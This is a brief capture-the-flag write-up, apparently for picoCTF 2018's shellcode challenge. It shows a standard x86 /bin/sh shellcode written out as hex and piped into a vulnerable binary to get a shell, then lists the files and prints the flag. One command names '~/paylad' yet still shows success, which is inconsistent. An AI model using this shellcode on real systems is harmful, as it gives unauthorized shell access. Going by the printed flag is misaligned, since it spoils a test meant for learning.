Using a standard /bin/sh shellcode payload online, we can pop open a privileged shell and
view the flag.

james9909@pico-2018-shell-3:/problems/shellcode_1_cec2eb801137d645a9f15b9b6af5347a$ python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' > ~/payload
james9909@pico-2018-shell-3:/problems/shellcode_1_cec2eb801137d645a9f15b9b6af5347a$ cat ~/paylad - | ./vuln
Enter a string!
1Ph//shh/bin°
			 ̀1@̀
Thanks! Executing now...
ls
flag.txt  vuln  vuln.c
cat flag.txt
picoCTF{shellc0de_w00h00_26e91a77}
